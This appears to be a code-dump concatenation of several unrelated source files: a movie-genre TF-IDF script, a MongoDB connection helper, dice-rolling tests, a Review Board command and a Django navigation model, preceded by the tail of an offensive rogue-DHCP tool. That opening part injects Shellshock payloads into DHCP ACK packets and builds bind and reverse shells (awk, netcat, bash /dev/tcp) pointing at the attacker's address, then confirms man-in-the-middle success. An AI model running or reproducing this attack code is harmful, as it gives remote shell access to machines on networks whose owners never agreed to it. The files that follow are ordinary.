str(IPAddress(network_mask).netmask_bits()) + " dev " + args.iface_name + ";"
# Shellshock payload: <user bash command>
if args.shellshock_command is not None:
payload = args.shellshock_command
# Shellshock payload:
# awk 'BEGIN{s="/inet/tcp/<bind_port>/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &
if args.bind_shell:
payload = "awk 'BEGIN{s=\"/inet/tcp/" + str(args.bind_port) + \
"/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &"
# Shellshock payload:
# rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f &
if args.nc_reverse_shell:
payload = "rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + \
your_ip_address + " " + str(args.reverse_port) + " >/tmp/f &"
# Shellshock payload:
# /bin/nc -e /bin/sh <your_ip> <your_port> 2>&1 &
if args.nce_reverse_shell:
payload = "/bin/nc -e /bin/sh " + your_ip_address + " " + str(args.reverse_port) + " 2>&1 &"
# Shellshock payload:
# /bin/bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1 &
if args.bash_reverse_shell:
payload = "/bin/bash -i >& /dev/tcp/" + your_ip_address + \
"/" + str(args.reverse_port) + " 0>&1 &"
if payload is not None:
# Do not add network settings command in payload
if not args.without_network:
payload = net_settings + payload
# Send payload to target in clear text
if args.without_base64:
shellshock_url = "() { :; }; " + payload
# Send base64 encoded payload to target in clear text
else:
payload = b64encode(payload)
shellshock_url = "() { :; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")"
# endregion
# region Check Shellshock payload length
if shellshock_url is not None:
if len(shellshock_url) > 255:
Base.print_error("Length of shellshock payload is very big! Current length: ",
str(len(shellshock_url)), " Maximum length: ", "254")
shellshock_url = "A"
# endregion
# endregion
# region Send DHCP ack and print info message
if args.broadcast_response:
ack_packet = make_dhcp_ack_packet(transaction_id, client_mac_address, requested_ip)
else:
ack_packet = make_dhcp_ack_packet(transaction_id, client_mac_address, requested_ip,
client_mac_address, requested_ip)
Base.print_info("DHCP ACK to: ", client_mac_address, " requested ip: ", requested_ip)
SOCK.send(ack_packet)
# endregion
# region Add client info in global clients dictionary
try:
clients[client_mac_address].update({"mitm": "success"})
except KeyError:
clients[client_mac_address] = {"mitm": "success"}
# endregion
# endregion
# endregion
# endregion
# endregion
# region DHCP DECLINE
if request['DHCP'][53] == 4:
# Get requested IP
requested_ip = "0.0.0.0"
if 50 in request['DHCP'].keys():
requested_ip = str(request['DHCP'][50])
# Print info message
Base.print_info("DHCP DECLINE from: ", requested_ip + " (" + client_mac_address + ")",
" transaction id: ", hex(transaction_id))
# If client IP in free IP addresses list delete this
if requested_ip in free_ip_addresses:
free_ip_addresses.remove(requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"decline_ip": requested_ip, "decline": True},
client_already_in_dictionary)
# print clients
# endregion
# endregion DHCP
# region ARP
if 'ARP' in request.keys():
if request['Ethernet']['destination'] == "ff:ff:ff:ff:ff:ff" and \
request['ARP']['target-mac'] == "00:00:00:00:00:00":
# region Set local variables
arp_sender_mac_address = request['ARP']['sender-mac']
arp_sender_ip_address = request['ARP']['sender-ip']
arp_target_ip_address = request['ARP']['target-ip']
# endregion
# region Print info message
Base.print_info("ARP request from: ", arp_sender_mac_address,
" \"", "Who has " + arp_target_ip_address + "? Tell " + arp_sender_ip_address, "\"")
# endregion
# region Get client mitm status
try:
mitm_status = clients[arp_sender_mac_address]["mitm"]
except KeyError:
mitm_status = ""
# endregion
# region Get client requested ip
try:
requested_ip = clients[arp_sender_mac_address]["requested_ip"]
except KeyError:
requested_ip = ""
# endregion
# region Create IPv4 address conflict
if mitm_status.startswith("error"):
arp_reply = arp.make_response(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=arp_sender_mac_address,
sender_mac=your_mac_address, sender_ip=arp_target_ip_address,
target_mac=arp_sender_mac_address, target_ip=arp_sender_ip_address)
SOCK.send(arp_reply)
Base.print_info("ARP response to: ", arp_sender_mac_address,
" \"", arp_target_ip_address + " is at " + your_mac_address,
"\" (IPv4 address conflict)")
# endregion
# region MITM success
if mitm_status.startswith("success"):
if arp_target_ip_address == requested_ip:
clients[arp_sender_mac_address].update({"client request his ip": True})
if arp_target_ip_address == router_ip_address:
clients[arp_sender_mac_address].update({"client request router ip": True})
if arp_target_ip_address == dns_server_ip_address:
clients[arp_sender_mac_address].update({"client request dns ip": True})
try:
test = clients[arp_sender_mac_address]["client request his ip"]
test = clients[arp_sender_mac_address]["client request router ip"]
test = clients[arp_sender_mac_address]["client request dns ip"]
try:
test = clients[arp_sender_mac_address]["success message"]
except KeyError:
if args.exit:
sleep(3)
Base.print_success("MITM success: ", requested_ip + " (" + arp_sender_mac_address + ")")
exit(0)
else:
Base.print_success("MITM success: ", requested_ip + " (" + arp_sender_mac_address + ")")
clients[arp_sender_mac_address].update({"success message": True})
except KeyError:
pass
# endregion
# endregion
# endregion
# region Main function
if __name__ == "__main__":
# region Add ip addresses in list with free ip addresses from first to last offer IP
if target_ip_address is None:
Base.print_info("Create list with free IP addresses in your network ...")
get_free_ip_addresses()
# endregion
# region Send DHCP discover packets in the background thread
if args.send_discover:
Base.print_info("Start DHCP discover packets send in the background thread ...")
if args.discover_rand_mac:
dhcp_discover_packets_source_mac = eth.get_random_mac()
Base.print_info("DHCP discover packets Ethernet source MAC: ", dhcp_discover_packets_source_mac,
" (random MAC address)")
else:
dhcp_discover_packets_source_mac = your_mac_address
Base.print_info("DHCP discover packets Ethernet source MAC: ", dhcp_discover_packets_source_mac,
" (your MAC address)")
Base.print_info("Delay between DHCP discover packets: ", str(args.discover_delay))
tm.add_task(discover_sender)
# endregion
# region Sniff network
# region Create RAW socket for sniffing
raw_socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
# endregion
# region Print info message
Base.print_info("Waiting for a ARP or DHCP requests ...")
# endregion
# region Start sniffing
while True:
# region Try
try:
# region Sniff packets from RAW socket
packets = raw_socket.recvfrom(2048)
for packet in packets:
# region Parse Ethernet header
ethernet_header = packet[0:eth.header_length]
ethernet_header_dict = eth.parse_header(ethernet_header)
# endregion
# region Could not parse Ethernet header - break
if ethernet_header_dict is None:
break
# endregion
# region Ethernet filter
if target_mac_address is not None:
if ethernet_header_dict['source'] != target_mac_address:
break
else:
if ethernet_header_dict['source'] == your_mac_address:
break
if dhcp_discover_packets_source_mac is not None:
if ethernet_header_dict['source'] == dhcp_discover_packets_source_mac:
break
# endregion
# region ARP packet
# 2054 - Type of ARP packet (0x0806)
if ethernet_header_dict['type'] == arp.packet_type:
# region Parse ARP packet
arp_header = packet[eth.header_length:eth.header_length + arp.packet_length]
arp_packet_dict = arp.parse_packet(arp_header)
# endregion
# region Could not parse ARP packet - break
if arp_packet_dict is None:
break
# endregion
# region ARP filter
if arp_packet_dict['opcode'] != 1:
break
# endregion
# region Call function with full ARP packet
reply({
'Ethernet': ethernet_header_dict,
'ARP': arp_packet_dict
})
# endregion
# endregion
# region IP packet
# 2048 - Type of IP packet (0x0800)
if ethernet_header_dict['type'] == ip.header_type:
# region Parse IP header
ip_header = packet[eth.header_length:]
ip_header_dict = ip.parse_header(ip_header)
# endregion
# region Could not parse IP header - break
if ip_header_dict is None:
break
# endregion
# region UDP
if ip_header_dict['protocol'] == udp.header_type:
# region Parse UDP header
udp_header_offset = eth.header_length + (ip_header_dict['length'] * 4)
udp_header = packet[udp_header_offset:udp_header_offset + udp.header_length]
udp_header_dict = udp.parse_header(udp_header)
# endregion
# region Could not parse UDP header - break
if udp_header is None:
break
# endregion
# region DHCP packet
if udp_header_dict['destination-port'] == 67 and udp_header_dict['source-port'] == 68:
# region Parse DHCP packet
dhcp_packet_offset = udp_header_offset + udp.header_length
dhcp_packet = packet[dhcp_packet_offset:]
dhcp_packet_dict = dhcp.parse_packet(dhcp_packet)
# endregion
# region Could not parse DHCP packet - break
if dhcp_packet_dict is None:
break
# endregion
# region Call function with full DHCP packet
full_dhcp_packet = {
'Ethernet': ethernet_header_dict,
'IP': ip_header_dict,
'UDP': udp_header_dict
}
full_dhcp_packet.update(dhcp_packet_dict)
reply(full_dhcp_packet)
# endregion
# endregion
# endregion
# endregion
# endregion
# endregion
# region Exception - KeyboardInterrupt
except KeyboardInterrupt:
Base.print_info("Exit")
exit(0)
# endregion
# endregion
# endregion
# endregion
| unlicense | 2,859,265,539,066,611,700 | 41.478261 | 131 | 0.544649 | false |
jadhavhninad/-CSE_515_MWD_Analytics- | Phase 1/Project Code/phase1_code/differentiate_genre.py | 1 | 17298 | from mysqlConn import DbConnect
import argparse
import operator
from math import log,fabs
import pprint
#DB connector and curosor
db = DbConnect()
db_conn = db.get_connection()
cur2 = db_conn.cursor();
#Argument parser
parser = argparse.ArgumentParser()
parser.add_argument("GENRE1")
parser.add_argument("GENRE2")
parser.add_argument("MODEL")
args = parser.parse_args()
##########################################
#General computation
#########################################
#1. Getting total number of movies in genre1 U genre2
cur2.execute("SELECT COUNT(distinct movieid) FROM mlmovies_clean where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result0 = cur2.fetchone()
total_movie_count = float(result0[0])
if args.MODEL== "TF-IDF-DIFF":
###############################
#MODEL = TF_IDF_DIFF
###############################
#===============================================================================================
#Subtask-1 : Calculate the weighted unique movies count returned by a tag for set of movies in genre1 U genre2
#===============================================================================================
cur2.execute("SELECT COUNT(distinct movieid) FROM mlmovies_clean where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result0 = cur2.fetchone()
total_movie_count = result0[0]
#Since we already have the TF value and it's data, we now generate the required data for idf.
#IDF here will be considered as the number of movie-genre that belong to a certain tag. So the idf calculation will be
# Total movie-genres / sum of weight of movie-genre with a particular tag
#Calculate the total weighted count for movie-genre count for each tag.
#weighted count for an occurance of a tag = tag_newness
weighted_genre_movie_count={}
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
#print data1
genre_movie_id = data1[0]
genre_tag_id=""
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
genre_tag_newness = data2[1]
#Get the tag_name for the tagID. For each tag weight, add the rank_weight as well.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
tagWeight = round((float(genre_tag_newness)),10)
if tagName in weighted_genre_movie_count:
weighted_genre_movie_count[tagName] = round((weighted_genre_movie_count[tagName] + tagWeight), 10)
else:
weighted_genre_movie_count[tagName] = tagWeight
# ===============================================================================
#Subtask-2: Get the TF , IDF and TF-IDF for the genres
#===============================================================================
data_dictionary_tf_genre1 = {}
data_dictionary_tf_idf_genre1 = {}
total_tag_newness_weight = 0
#Get all movies of genre 1.
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE1])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
genre_tag_newness = data2[1]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
tagWeight = round(float(genre_tag_newness),10)
total_tag_newness_weight = total_tag_newness_weight + tagWeight
#For TF
if tagName in data_dictionary_tf_genre1:
data_dictionary_tf_genre1[tagName] = round((data_dictionary_tf_genre1[tagName] + tagWeight),10)
else:
data_dictionary_tf_genre1[tagName] = tagWeight
# Make weight of other tags to zero. Calculate the tf, idf and tf-idf values for the tags that exist.
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyVal in tagName:
key = keyVal[0]
if key in data_dictionary_tf_genre1:
data_dictionary_tf_genre1[key] = round((float(data_dictionary_tf_genre1[key]) / float(total_tag_newness_weight)),10)
data_dictionary_tf_idf_genre1[key] = round((float(log((total_movie_count/weighted_genre_movie_count[key]),2.71828))), 10)
data_dictionary_tf_idf_genre1[key] = round((data_dictionary_tf_genre1[key] * data_dictionary_tf_idf_genre1[key]), 10)
else:
data_dictionary_tf_genre1[key] = 0.0
#genre_model_value_tf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True)
#genre_model_value_tfidf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True)
#Get all movies of a specific genre 2.
#--------------------------------------
data_dictionary_tf_genre2 = {}
data_dictionary_tf_idf_genre2 = {}
total_tag_newness_weight = 0
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
genre_tag_newness = data2[1]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
tagWeight = round(float(genre_tag_newness),10)
total_tag_newness_weight = total_tag_newness_weight + tagWeight
#For TF
if tagName in data_dictionary_tf_genre2:
data_dictionary_tf_genre2[tagName] = round((data_dictionary_tf_genre2[tagName] + tagWeight),10)
else:
data_dictionary_tf_genre2[tagName] = tagWeight
# Make weight of other tags to zero.
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyVal in tagName:
key=keyVal[0]
if key in data_dictionary_tf_genre2:
data_dictionary_tf_genre2[key] = round((float(data_dictionary_tf_genre2[key]) / float(total_tag_newness_weight)),10)
data_dictionary_tf_idf_genre2[key] = round((float(log((total_movie_count/weighted_genre_movie_count[key]),2.71828))), 10)
data_dictionary_tf_idf_genre2[key] = round((data_dictionary_tf_genre2[key] * data_dictionary_tf_idf_genre2[key]), 10)
else:
data_dictionary_tf_genre2[key] = 0.0
#genre_model_value_tf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True)
#genre_model_value_tfidf_genre2 = sorted(data_dictionary_tf_genre2.items(), key=operator.itemgetter(1), reverse=True)
#--------------------------------------------------------------------------------------------------------------
#Subtask-3 : Calculate the DIFF vector
#Manhattan distance is used since for high dimensions it works better. compared to higher order minkowski distance
diff_vector={}
#Makes more sense to have +ve 0, and -ve as it clearly states the difference, between genre1
#and genre2.
for key in data_dictionary_tf_idf_genre1:
if key in data_dictionary_tf_idf_genre2:
diff_vector[key] = data_dictionary_tf_idf_genre1[key] - data_dictionary_tf_idf_genre2[key]
else:
diff_vector[key] = data_dictionary_tf_idf_genre1[key]
for key in data_dictionary_tf_idf_genre2:
if key in diff_vector:
continue
else:
diff_vector[key] = 0 - data_dictionary_tf_idf_genre2[key]
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyVal in tagName:
key = keyVal[0]
if key in diff_vector:
continue;
else:
diff_vector[key] = 0.0
genre_diff = sorted(diff_vector.items(), key=operator.itemgetter(1), reverse=True)
#pprint.pprint(genre_model_value_tfidf_genre1)
#pprint.pprint(genre_model_value_tfidf_genre2)
pprint.pprint(genre_diff)
elif args.MODEL == "P-DIFF1" :
###############################
#MODEL = P-DIFF-1
###############################
# ===============================================================================
#Subtask-1: Calculate the number of movies for a given tag for genre1 and genre2
#and total movies in genre1
#================================================================================
dd_r1_genre1 = {}
dd_m1_genre2 = {}
M = total_movie_count #Movies in genre1 U genre2
cur2.execute("SELECT count(movieid) FROM `mlmovies_clean` where genres = %s",[args.GENRE1])
result1 = cur2.fetchone()
R = float(result1[0]) #Movies in genre1
#Calculation for genre1. r = movies in genre1 with tag t
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE1])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_r1_genre1:
dd_r1_genre1[tagName] = (dd_r1_genre1[tagName] + 1)
else:
dd_r1_genre1[tagName] = 1
#Calculation for m=movies in genre1 U genre 2 with tag t
cur2.execute("SELECT distinct(movieid) FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_m1_genre2:
dd_m1_genre2[tagName] = (dd_m1_genre2[tagName] + 1)
else:
dd_m1_genre2[tagName] = 1
#print dd_r1_genre1
#print dd_m1_genre2
#Subtask:2 - Calculate the pdiff1 using the given formula
pdiff_wt_genre1={}
for tag in dd_m1_genre2:
r=0
if tag in dd_r1_genre1:
r = float(dd_r1_genre1[tag])
m = float(dd_m1_genre2[tag])
val1=0
val2=0
val3=0
val4=0
#r = 0 means that the tag never occurs for a genre.
#R=r means that the tag occurs for every movie of the genre, so its frequency is 1 and
#discriminating power is 0 . In both the scenarios, we ignore such a tag.
#m>= r always since its a union.
# Get the probability of the tag in M and add it to avoid edge cases- ref:Salton & buckley
p_tag = float(m / M)
#explain why you think square term comes in the picture.But as the max probability will be 1, the term does not make
#much difference for values less than 1.
val1 = float(float(r + p_tag)/(R-r+1))
val3 = float(float(r + p_tag)/(R + 1))
val2 = float((m-r+p_tag)/(M-m-R+r+1))
val4 = float((m-r+p_tag)/(M-R+1))
pdiff_wt_genre1[tag] = float(log(float(val1/val2),2)) * float(val3 - val4)
#Make weight of other tags to zero
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyval in tagName:
key = keyval[0]
if key in pdiff_wt_genre1:
continue
else:
pdiff_wt_genre1[key] = 0
pprint.pprint(sorted(pdiff_wt_genre1.items(), key=operator.itemgetter(1), reverse=True))
elif args.MODEL == "P-DIFF2":
###############################
#MODEL = P-DIFF-2
###############################
# ===============================================================================
#Subtask-1: Calculate the number of movies for a given tag for genre1 and genre2
#and total movies in genre2
#================================================================================
dd_r1_genre1 = {}
dd_m1_genre2 = {}
M = total_movie_count #Movies in genre1 U genre2
cur2.execute("SELECT count(movieid) FROM `mlmovies_clean` where genres = %s",[args.GENRE2])
result1 = cur2.fetchone()
R = float(result1[0]) #Movies in genre1
#Calculation for genre2. r = movies in genre2 without tag t. We first get the value of movies in genre2 with tag t then
#subtract that value from total movies there in genre2, for each tag
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_r1_genre1:
dd_r1_genre1[tagName] = (dd_r1_genre1[tagName] + 1)
else:
dd_r1_genre1[tagName] = 1
#Calculation for genre2. m=movies in genre1 U genre 2 without tag t. Subtract later from M to get movies in genre1 or genre2
#without a tag
cur2.execute("SELECT distinct(movieid) FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_m1_genre2:
dd_m1_genre2[tagName] = (dd_m1_genre2[tagName] + 1)
else:
dd_m1_genre2[tagName] = 1
#Subtask:2 - Calculate the pdiff1 using the given formula
pdiff_wt_genre1={}
for tag in dd_m1_genre2:
r = R
if tag in dd_r1_genre1:
r = R - float(dd_r1_genre1[tag])
m = M - float(dd_m1_genre2[tag])
val1=0
val2=0
val3=0
val4=0
#r = 0 means that the tag never occurs for a genre.
#R=r means that the tag occurs for every movie of the genre, so its frequency is 1 and
#discriminating power is 0 . In both the scenarios, we ignore such a tag.
#m>= r always since its a union.
# Get the probability of the tag not in M and add it to avoid edge cases- ref:Salton & buckley
p_tag = float(m / M)
#explain why you think square term comes in the picture.But as the max probability will be 1, the term does not make
#much difference for values less than 1.
val1 = float(float(r + p_tag)/(R-r+1))
val3 = float(float(r + p_tag)/(R + 1))
val2 = float((m-r+p_tag)/(M-m-R+r+1))
val4 = float((m-r+p_tag)/(M-R+1))
pdiff_wt_genre1[tag] = float(log(float(val1/val2),2)) * (float(val3 - val4))
#Make weight of other tags to zero
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyval in tagName:
key = keyval[0]
if key in pdiff_wt_genre1:
continue
else:
pdiff_wt_genre1[key] = 0
pprint.pprint(sorted(pdiff_wt_genre1.items(), key=operator.itemgetter(1), reverse=True))
| gpl-3.0 | 3,274,444,029,248,706,600 | 33.875 | 133 | 0.578737 | false |
mettadatalabs1/oncoscape-datapipeline | db/db_config.py | 1 | 2247 | from yaml import load as load_yaml
config_file = "/Users/namelessnerd/oncodata/db/connection_params.yml"
def load_db_configuration(config_file=config_file):
with open(config_file, "r") as config_file:
configs = load_yaml(config_file)
return configs
def create_mongo_protocol(project_id, connection_params):
"""
Returns a connection string according to the mongo protocol,
mongodb://[username:pwd@]host1[:port1][,host2[:port2]][/[db][?options]]
Refer to https://docs.mongodb.com/manual/reference/connection-string/
Args:
project_id (str): The project id used in connection params file for
which we are creating this connection.
Returns:
(str): String formatted per Mongo connection format
"""
conn_string = "mongodb://{user_name}:{pwd}@{host_port}/{db}?{options}"
# configs (dict) - dictionary object holding the database configurations
configs = load_db_configuration(connection_params)
try:
user = configs[project_id]["user_name"]
pwd = configs[project_id]["password"]
hosts = configs[project_id]["hosts"]
db=configs[project_id]["db"]
print(hosts)
except KeyError:
return None
options = configs[project_id]["options"]\
if "options" in configs[project_id] else None
return conn_string.format(user_name=user,
pwd=pwd,
# join the host and port if port is specificed. Else
# use the default port
host_port=",".join([host["host"] + ":" +
(str(host["port"]) if "port" in host
else "27017")
for host in hosts]),
db=db,
# include options if options are specificed else empty
# string
options="&".join([option + "=" + options[option]\
for option in options]) if options else '')
# host: "mongo://" +\
# db_config.creds["host_name"]["user"] +\
# db_config.creds["host_name"]["pwd"] +\
# "@" + host_name
| apache-2.0 | -1,887,707,074,555,252,500 | 43.058824 | 78 | 0.546951 | false |
campaul/dicebox | dicebox/test/test_dice.py | 1 | 4083 | import mock
import pytest
from dicebox.dice import Add, Best, Die, DiceFactory, Modifier, Pool, Sort, Worst
class TestDiceFactory(object):
@pytest.fixture
def sides(self):
return 20
def test_call(self, sides):
assert type(DiceFactory()(sides)) == Die
def test_bias(self, sides):
rng = mock.Mock()
factory = DiceFactory()
with factory.bias(rng):
factory(20)()
rng.assert_called_with(1, 20)
class TestDie(object):
@pytest.fixture
def count(self):
return 5
@pytest.fixture
def die(self, rng):
return Die(20, rng)
@pytest.fixture
def random(self):
return 4
@pytest.fixture
def rng(self, random):
return mock.Mock(return_value=random)
def test_call(self, die, random, rng):
assert die() == random
rng.assert_called_with(1, 20)
def test_each(self, die, random, rng):
assert die.each() == random
rng.assert_called_with(1, 20)
def test_mul(self, count, die, random):
pool = die * count
assert pool.each() == [random for i in range(count)]
def test_rmul(self, count, die, random):
pool = count * die
assert pool.each() == [random for i in range(count)]
def test_add(self, count, die):
pool = die + count
assert pool.each() == [die.each(), count]
def test_sub(self, count, die):
pool = die - count
assert pool.each() == [die.each(), -count]
def test_int(self, die, random):
assert int(die) == random
class TestModifier(object):
randoms = None
def log_random(self, r):
if self.randoms is None:
self.randoms = []
self.randoms.append(r)
return r
@pytest.fixture
def count(self):
return 5
@pytest.fixture
def rng_value(self):
return 4
@pytest.fixture
def rng(self, rng_value):
return lambda start, finish: self.log_random(rng_value)
@pytest.fixture
def die(self, rng):
return Die(20, rng)
@pytest.fixture
def modifier(self, die, count):
return Modifier(die, count)
def test_each(self, modifier, count):
assert modifier.each() == self.randoms
def test_int(self, modifier, rng_value, count):
assert int(modifier) == sum(self.randoms)
class TestPool(TestModifier):
@pytest.fixture
def rng(self):
def rng(start, end):
if self.randoms is None:
return self.log_random(1)
else:
return self.log_random(self.randoms[-1] + 1)
return rng
@pytest.fixture
def modifier(self, die, count):
return Pool(die, count)
def test_rshift(self, modifier):
assert (modifier >> 2).each() == [4, 5]
def test_lshift(self, modifier):
assert (modifier << 2).each() == [1, 2]
class TestAdd(TestModifier):
@pytest.fixture
def modifier(self, die, count):
return Add(die, count)
def test_each(self, modifier, count):
assert modifier.each() == self.randoms + [count]
def test_int(self, modifier, count):
assert int(modifier) == sum(self.randoms + [count])
class TestSort(TestModifier):
@pytest.fixture
def modifier(self, die, count):
return Sort(Pool(die, count), None)
def test_each(self, modifier):
assert modifier.each() == sorted(self.randoms)
def result(self):
return sorted(self.randoms)
def test_each(self, modifier):
assert modifier.each() == self.result()
def test_int(self, modifier):
assert int(modifier) == sum(self.result())
class TestBest(TestSort):
@pytest.fixture
def modifier(self, die, count):
return Best(Pool(die, count), count - 1)
def result(self):
return sorted(self.randoms)[1:]
class TestWorst(TestSort):
@pytest.fixture
def modifier(self, die, count):
return Worst(Pool(die, count), count - 1)
def result(self):
return sorted(self.randoms)[:-1]
| mit | 7,768,028,179,165,356,000 | 21.311475 | 81 | 0.590987 | false |
brettdh/rbtools | rbtools/commands/status.py | 1 | 2506 | import logging
from rbtools.commands import Command, Option
from rbtools.utils.repository import get_repository_id
from rbtools.utils.users import get_username
class Status(Command):
"""Display review requests for the current repository."""
name = "status"
author = "The Review Board Project"
description = "Output a list of your pending review requests."
args = ""
option_list = [
Option("--all",
dest="all_repositories",
action="store_true",
default=False,
help="Show review requests for all repositories instead "
"of the detected repository."),
Command.server_options,
Command.repository_options,
Command.perforce_options,
]
def output_request(self, request):
print " r/%s - %s" % (request.id, request.summary)
def output_draft(self, request, draft):
print " * r/%s - %s" % (request.id, draft.summary)
def main(self):
repository_info, tool = self.initialize_scm_tool(
client_name=self.options.repository_type)
server_url = self.get_server_url(repository_info, tool)
api_client, api_root = self.get_api(server_url)
self.setup_tool(tool, api_root=api_root)
username = get_username(api_client, api_root, auth_required=True)
query_args = {
'from_user': username,
'status': 'pending',
'expand': 'draft',
}
if not self.options.all_repositories:
repo_id = get_repository_id(
repository_info,
api_root,
repository_name=self.options.repository_name)
if repo_id:
query_args['repository'] = repo_id
else:
logging.warning('The repository detected in the current '
'directory was not found on\n'
'the Review Board server. Displaying review '
'requests from all repositories.')
requests = api_root.get_review_requests(**query_args)
try:
while True:
for request in requests:
if request.draft:
self.output_draft(request, request.draft[0])
else:
self.output_request(request)
requests = requests.get_next(**query_args)
except StopIteration:
pass
| mit | 7,896,034,050,389,022,000 | 33.805556 | 77 | 0.553472 | false |
mennanov/django-blueprint | project_name/apps/navigation/models.py | 1 | 1661 | # -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from mptt.models import TreeForeignKey, TreeManyToManyField, MPTTModel
class Navigation(models.Model):
"""
Navigation menu
"""
key = models.CharField(_(u'key'), max_length=32, help_text=_(u'This value is used in the code, do not touch it!'))
name = models.CharField(_(u'name'), max_length=70)
links = TreeManyToManyField('Link', verbose_name=_(u'links'), through='LinkMembership')
def __unicode__(self):
return self.name
class Meta:
verbose_name = _(u'navigation menu')
verbose_name_plural = _(u'navigation menus')
class Link(MPTTModel):
"""
Navigation link
"""
parent = TreeForeignKey('self', verbose_name=_(u'parent link'), null=True, blank=True)
name = models.CharField(_(u'name'), max_length=70, help_text=_(u'Name of the link in the menu'))
url = models.CharField(_(u'url'), max_length=255, help_text=_(u'Example: "/about/" or "/"'))
def __unicode__(self):
return self.name
def get_absolute_url(self):
return self.url
class Meta:
verbose_name = _(u'navigation link')
verbose_name_plural = _(u'navigation links')
class LinkMembership(models.Model):
"""
Link in navigation membership
"""
navigation = models.ForeignKey('Navigation')
link = TreeForeignKey('Link')
position = models.PositiveIntegerField(_(u'position'), default=0, db_index=True)
class Meta:
ordering = ['position']
verbose_name = _(u'link membership')
verbose_name_plural = _(u'link memberships') | gpl-2.0 | -8,933,735,953,260,462,000 | 30.358491 | 118 | 0.64118 | false |
ity/pants | src/python/pants/engine/nodes.py | 1 | 17119 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
